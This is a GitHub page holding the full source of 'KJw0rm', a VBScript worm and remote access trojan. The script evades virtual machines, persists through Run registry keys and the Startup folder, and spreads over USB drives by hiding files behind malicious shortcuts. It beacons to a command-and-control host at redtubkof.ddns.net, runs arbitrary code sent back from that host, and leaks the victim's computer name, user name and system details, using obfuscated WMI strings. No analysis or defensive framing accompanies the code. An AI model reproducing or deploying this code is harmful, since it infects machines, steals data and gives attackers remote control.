forked from CCrashBandicot/helpful
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Kjworm.vbs
259 lines (259 loc) · 8.1 KB
/
Kjworm.vbs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
'MrLi0nHere
'KJw0rm
'Thanx njq8
On Error Resume Next
dim sh ' shell
set sh =WScript.CreateObject("WScript.Shell")
dim fs ' filesystem
set fs= CreateObject("Scripting.FileSystemObject")
dim dotnet
dotnet="No"
if fs.fileexists(sh.ExpandEnvironmentStrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") then
dotnet="Yes"
end if
vmcheck
dim host
host= "redtubkof.ddns.net"
dim port
port=1010
dim DR
DR = sh.ExpandEnvironmentStrings("%AppData%") & "\"
dim FN
FN ="System.vbs"
dim fh
dim us
us="~"
ins
dim spl
spl="KsKsK"
dim i
i=0
while true
dim a
a= split(post("ready",""),spl)
select case a(0)
case "exc"
dim sa
sa= a(1)
execute sa
case "uns"
uns ""
end select
wscript.sleep 4000
i = i + 1
if i> 2 then
i=0
xins
end if
wend
function vmcheck()
On Error Resume Next
Set WMI = GetObject("WinMgmts:")
Set Col = WMI.ExecQuery("Select * from Win32_ComputerSystemProduct")
For Each Ob in Col
if instr( lcase( ob.name),"virtual") >0 then
On Error Resume Next
fs.deletefile(wscript.scriptfullname)
do
wscript.sleep(1000)
loop
end if
next
end Function
function ins
on error resume next
us= sh.regread("HKCU\KJ")
if us="~" then
if lcase( mid(wscript.scriptfullname,2))=":\" & lcase(fn) then
us="Yes"
sh.regwrite "HKCU\KJ", us, "REG_SZ"
else
us="No"
sh.regwrite "HKCU\KJ", us, "REG_SZ"
end if
end if
Err.Clear
fs.CopyFile wscript.scriptfullname,dr & fn ,true
set fh = fs.OpenTextFile( dr & fn, 8, false)
if Err.Number>0 then
wscript.quit
end if
xins
end function
sub xins
on error resume next
sh.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr & fn & chrw(34), "REG_SZ"
sh.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr & fn & chrw(34), "REG_SZ"
fs.copyfile wscript.scriptfullname, CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
for each xx in fs.Drives
if xx.isready then
if xx.FreeSpace >0 then
if xx.drivetype=1 then
if fs.fileexists(xx.path & "\" & fn) then
fs.getfile(xx.path & "\" & fn).Attributes=0
end if
fs.copyfile dr & fn , xx.path & "\" & fn,true
dim mx
mx=0
for Each x In fs.GetFolder( xx.path & "\" ).Files
if mx=20 then
exit for
end if
wscript.sleep 1
if instr(x.name,".") Then
if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" Then
x.Attributes = 2
if ucase(x.name) <> ucase(fn) Then
mx =mx +1
With sh.CreateShortcut(xx.path & "\" & x.name & ".lnk")
.TargetPath = "cmd.exe"
.WorkingDirectory = ""
.WindowStyle=7
.Arguments = "/c start " & Replace(fn," ", ChrW(34) _
& " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " & exit"
.IconLocation = sh.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\" & sh.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
if instr( .iconlocation,",")=0 then
.iconlocation = .iconlocation &",0"
end if
.Save()
end with
end if
end if
end if
Next
mx=0
fs.CreateFolder(xx.path & "\Videos\" )
for Each x In fs.GetFolder( xx.path & "\" ).SubFolders
if mx=20 then
exit for
end if
wscript.sleep 1
x.Attributes = 2
mx =mx +1
With sh.CreateShortcut(xx.path & "\" & x.name & ".lnk")
.TargetPath = "cmd.exe"
.WorkingDirectory = ""
.WindowStyle=7
.Arguments = "/c start " & Replace(fn," ", ChrW(34)& " " & ChrW(34)) & "&start explorer /root,%CD%" & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & "& exit"
.IconLocation = "%windir%\system32\SHELL32.dll,3"
.Save()
end with
Next
end if
end if
end if
next
Err.Clear
end sub
function uns(ex)
on error resume Next
fi.close
fh.close
sh.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & FN
sh.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & FN
fs.DeleteFile dr & fn ,true
fs.DeleteFile CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & FN ,True
for each xx in fs.Drives
if xx.isready then
if xx.FreeSpace >0 then
For Each x In fs.GetFolder( xx.path & "\").Files
On Error Resume Next
if instr(x.name,".") then
if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
x.Attributes = 0
if ucase(x.name) <> ucase(fn) then
fs.deletefile(xx.path & "\" & x.name & ".lnk" )
else
fs.deletefile( xx.path & "\" & x.name )
end if
end if
end If
Next
For Each x In fs.GetFolder( xx.path & "\").SubFolders
On Error Resume Next
if fs.fileexists( xx.Path & "\" & x.Name &".lnk") then
fs.deletefile(xx.path & "\" & x.name & ".lnk" )
end if
x.Attributes = 0
Next
end if
end if
Next
Dim tout
tout=0
Do until w.readystate=4
wscript.sleep(1000)
tout =tout + 1
If tout=10 Then Exit do
Loop
if ex<>"" then
sh.Run "cmd.exe /c ping 0&start " & ex,0, false
end if
wscript.quit
end function
function post(cmd ,da)
post=""
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "POST","http://" & host & ":" & port &"/" & cmd, false
o.setRequestHeader "User-Agent:", inf
o.send da
post=o.responseText
end function
dim xinf
function inf
on error resume next
if xinf="" then
dim s
s="??"
s = hwd
inf = inf & s & "\"
s="??"
s= sh.ExpandEnvironmentStrings("%COMPUTERNAME%")
inf = inf & s & "\"
s="??"
s= sh.ExpandEnvironmentStrings("%USERNAME%")
inf = inf & s & "\"
s="??"
Set szxquzftjy = GetObject( "w" & chrw(cint(33+72)) & "n" & "m" & "g" & "m" & "t" & chrw(cint(124-9)) & ":" & chrw(cint(2.86046511627907 * 43)) & chrw(cint(105)) & chrw(cint(63+46)) & "p" & "e" & chrw(3534 / 31) & chrw(115) & chrw(2775 / 25) & "n" & chrw(87+10) & "t" & "i" & chrw(13+98) & "n" & chrw(76) & "e" & chrw(cint(93+25)) & "e" & chrw(3888 / 36) & "=" & "i" & "m" & "p" & chrw(101) & chrw(3876 / 34) & chrw(115) & "o" & "n" & "a" & chrw(cint(116)) & chrw(cint(101)) & chrw(32 * 3.90625) & chrw(cint(51-18)) & "\" & chrw(6+86) & "." & chrw(cint(71+21)) & chrw(72+42) & "o" & chrw(111) & chrw(116) & chrw(cint(92)) & chrw(17+82) & "i" & chrw(218 / 2) & chrw(139-21) & chrw(300 / 6) )
Set yyotvzirsq = szxquzftjy.ExecQuery ( "S" & "e" & chrw(cint(3 * 36)) & "e" & chrw(107-8) & "t" & chrw(cint(46+-14)) & "*" & chrw(cint(9+23)) & "f" & "r" & "o" & "m" & " " & "W" & chrw(2.28260869565217 * 46) & chrw(102+8) & chrw(2.04 * 25) & "2" & "_" & chrw(32+47) & chrw(112) & chrw(48 * 2.10416666666667) & "r" & "a" & chrw(117-1) & chrw(cint(105 / 1)) & chrw(cint(66+44)) & "g" & chrw(71+12) & chrw(cint(4+117)) & "s" & chrw(cint(116)) & "e" & chrw(1090 / 10) )
dim cstdspjgkz
For Each aaa in yyotvzirsq
jgduwnagqo= aaa.Caption & " " & chrw(82+1) & chrw(14+66) & aaa.ServicePackMajorVersion
cstdspjgkz= aaa.countrycode
exit for
Next
jgduwnagqo= replace(jgduwnagqo, chrw(31+46) & chrw(cint(109-4)) & "c" & "r" & "o" & "s" & "o" & chrw(cint(102)) & "t" ,"")
jgduwnagqo= replace(jgduwnagqo, "W" & chrw(cint(3150 / 30)) & chrw(cint(21 * 5.23809523809524)) & chrw(3700 / 37) & "o" & chrw(101+18) & "s" & chrw(32) , "W" & chrw(20+85) & "n" )
jgduwnagqo= Replace(jgduwnagqo, " " & chrw(21.75 * 4) & "i" & "n" , "W" & chrw(20+85) & "n" )
jgduwnagqo = jgduwnagqo & chrw(cint(73-41)) & "x" & GetObject( chrw(5950 / 50) & chrw(735 / 7) & "n" & chrw(30+79) & chrw(4.47826086956522 * 23) & "m" & "t" & "s" & chrw(cint(38+20)) & "r" & "o" & "o" & chrw(116) & "\" & "c" & "i" & "m" & "v" & "2" & ":" & "W" & chrw(210 / 2) & "n" & "3" & chrw(1800 / 36) & "_" & chrw(cint(10+70)) & "r" & "o" & chrw(27+72) & chrw(3030 / 30) & chrw(cint(49 * 2.3469387755102)) & chrw(115) & "o" & chrw(cint(124-10)) & "=" & chrw(cint(8+31)) & chrw(99) & chrw(112) & "u" & "0" & "'" ).AddressWidth
inf = inf & jgduwnagqo & "\" & cstdspjgkz &"\0.5X\" & dotnet & nf &"\" & us &"\" & HWD
xinf=inf
else
inf=xinf
end if
end function
function HWD
HWD="KJw0rm"
On Error Resume Next
Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set aa = a.ExecQuery("SELECT * FROM Win32_LogicalDisk")
For Each aaa In aa
if aaa.VolumeSerialNumber<>"" then
HWD= "KJw0rm_" & aaa.VolumeSerialNumber
exit for
end if
Next
end function
Function nf
On Error Resume next
Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
Dim aSub, sKey , v
oReg.EnumKey &H80000002,"SOFTWARE\Microsoft\.NETFramework\Policy", aSub
For Each sKey In aSub
If InStr(sKey,"v") > 0 Then
v = sKey
End if
Next
nf = v
End Function